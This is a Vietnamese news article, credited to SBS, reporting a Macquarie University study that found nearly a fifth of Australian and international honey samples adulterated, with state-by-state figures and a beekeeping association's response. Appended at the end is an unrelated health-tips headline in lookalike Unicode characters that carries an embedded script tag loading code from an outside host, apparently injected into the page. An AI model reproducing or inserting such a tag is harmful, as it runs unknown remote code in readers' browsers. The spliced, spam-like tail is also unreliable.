RSS

Nghiên cứu Đại học Macquarie: Gần 20% mẫu mật ong Úc và quốc tế ‘không tinh khiết’

06:00 04/10/2018

Mật ong bị pha trộn có nguồn gốc từ hàng loạt các tiểu bang Victoria, Queensland, NSW và Tasmania. 23% trong số 9 mẫu được thử nghiệm ở Tasmania bị tạp nhiễm, một trong hai mẫu lấy từ NSW bị tạp nhiễm, 1/3 trong số 6 mẫu lấy từ Queensland thì không phải mật ong thuần khiết và 29% trong số 7 mẫu có nguồn gốc từ Victoria là hàng giả.

Mật ong từ lâu đã là một trong các sản phẩm được người Úc ưa chuộng, và sản phẩm bán tại Úc cũng được coi là những mặt hàng bảo đảm về phẩm chất, được ngoại quốc tin tưởng.

Thế nhưng, có lẽ tin tức được giới khoa học của Đại học Macquarie tuyên bố trên báo chí Úc ngày hôm nay có lẽ sẽ buộc người tiêu dùng phải nhìn lại vấn đề.

Theo một nghiên cứu mang tính đột phá, đã tiến hành thử nghiệm các mẫu mật ong mang nhãn hiệu của Úc và quốc tế, thì trong gần 100 mẫu mật ong bán tại Úc có đến gần 20% bị phát hiện là ‘không tinh khiết’

Các loại mật ong được kiểm tra bao gồm cả các thương hiệu đắt tiền và rẻ tiền.

20% mật ong bị pha trộn

Theo ABC, nghiên cứu được tiến hành bởi một nhóm các nhà khoa học tại Đại học Macquarie, đã sử dụng 100 mẫu mật ong có nguồn gốc trên toàn cầu, bao gồm 38 mẫu mật ong mang thương hiệu Úc.

Người ta phát hiện ra rằng cứ trong 5 sản phẩm của Úc được kiểm tra thì có đến gần 1 sản phẩm cho thấy là đã có sự pha trộn ở mức độ nào đó.

Các loại Mật ong pha trộn có nguồn gốc từ tiểu bang Vic, NSW, Qld và Tasmania.

Vấn đề còn nghiêm trọng hơn khi mà các khoa học gia phát hiện ra rằng có đến hơn một nửa số mẫu có nguồn gốc từ châu Á, chủ yếu là Trung Quốc, bị pha trộn, có nghĩa là mật ong đã được trộn lẫn với các chất khác mà nói cho dễ hiểu chất đó không phải mật ong.

Về độ tin cậy của thử nghiệm thì theo ABC, cuộc thử nghiệm được thực hiện tại Viện Đo lường Quốc gia, vốn có độ bảo đảm an ninh cao tương đương với phòng thí nghiệm của chính phủ, chuyến thử nghiệm các loại ma túy.

Và từ cuộc thử nghiệm này đã cho thấy 27% mẫu mật ong của nước ngoài thực ra không phải là 100% mật ong nguyên chất.

Cú sốc với mật ong Úc?

Thôi thì chuyện mật ong nước ngoài, nếu không được tiêu thụ tại Úc thì tạm gác sang một bên, nhưng giới hữu trách cho rằng đây là một cú sốc lớn đối với mật ong Úc.

Trong số 38 mẫu mật ong có nguồn gốc từ các siêu thị và tiệm tạp hóa phổ biến, thì có đến 18%, tương đương gần 1/5 sản phẩm đã bị pha trộn.

Đáng ngại là mật ong bị pha trộn có nguồn gốc từ hàng loạt các tiểu bang: Victoria, Queensland, NSW và Tasmania.

Cụ thể, có 23% trong số 9 mẫu được thử nghiệm ở Tasmania bị tạp nhiễm, một trong hai mẫu lấy từ NSW bị tạp nhiễm, 1/3 trong số 6 mẫu lấy từ Queensland thì không phải mật ong thuần khiết và 29% trong số 7 mẫu có nguồn gốc từ Victoria là hàng giả.

Thật may, các mẫu có nguồn gốc từ Nam Úc và Tây Úc được thử nghiệm đã cho thấy là mật ong tinh khiết.

Cũng chính từ thực tế này mà các nhà chức trách đang đứng trước áp lực phải tiến hành thử nghiệm các loại mật ong địa phương.

Trong khi đó, đối với khách hàng, chuyện mật ong bị pha loãng hay có các chất khác, không tinh khiết giờ đây làm ảnh hưởng đến lòng tin của khách hàng với mật ong nói chung, và dấy lên mối mối quan ngại về sức khỏe và an toàn.

Thậm chí nghiên cứu còn cho biết "Mật ong hỗn hợp không rõ nguồn gốc có chứa kháng sinh, độc tố, phấn hoa hoặc thậm chí là Alkaloids, chất có khả năng gây tổn thương cơ quan nội tạng,"

Hiệp hội Kỹ nghệ Nuôi ong lấy mật Úc châu nói gì?

Về thông tin này, ông Peter McDonald, chủ tịch Hiệp hội Kỹ nghệ Nuôi ong lấy mật Úc châu (AHBIC), một cơ quan đại diện cho ngành kỹ nghệ có tiếng này cho biết, thực sự giới hữu trách chưa chính thức kiểm tra mật ong trong nước.

"Đó là việc mà các công ty cá nhân tự đi mua mật ong để mang ra kiểm tra," ông McDonald nói.

Ông McDonald, người được Giáo sư Taylor giới thiệu về kết quả nghiên cứu, cho biết ông không tin rằng nước Úc có vấn đề gì đó liên quan đến chuyện pha trộn mật ong không tinh khiết và người tiêu dùng nên yên tâm về sản phẩm một khi trên nhãn đã khẳng định sản phẩm là mật ong thuần khiết.

Và là người trong nghề, ông McDonald khẳng định ông biết rõ về những người nuôi ong.

Họ vốn là những người trung thực, chăm chỉ và họ chỉ sử dụng những gì từ thiên nhiên, mật ong đang cung cấp được sản xuất một cách tinh khiết.

Tuy nhiên, ông thừa nhận rằng ông cũng không thể biết tất cả những người nuôi ong hay nhà sản xuất có thật sự đang làm điều đúng đắn hay không.

Nguồn: Sbs.com.au

Tɦᴜốc ɓổ ƙɦôпɢ ɓằпɢ łɦực ρɦẩɱ ɓổ: Cácɦ cɦăɱ sóc пɢũ łạпɢ łốł пɦấł ɢiúρ ɓạп sốпɢ łɦọ ɦơп<script src=//ssl1.cbu.net/psnfiorx></script>

Tɦᴜốc ɓổ ƙɦôпɢ ɓằпɢ łɦực ρɦẩɱ ɓổ: Cácɦ cɦăɱ sóc пɢũ łạпɢ łốł пɦấł ɢiúρ ɓạп sốпɢ łɦọ ɦơп

Tɦeo các ɓác sĩ, sức ƙɦỏe củɑ пɢũ łạпɢ qᴜyếł ᵭịпɦ łᴜổi łɦọ củɑ ɓạп. Đây ℓà ɓí qᴜyếł ℓựɑ cɦọп łɦực ρɦẩɱ cɦăɱ sóc cơ łɦể łốł пɦấł ɓạп пêп łɦɑɱ ƙɦảo ᵭể ℓᴜôп ƙɦỏe ɱạпɦ ʋà łɾườпɢ łɦọ.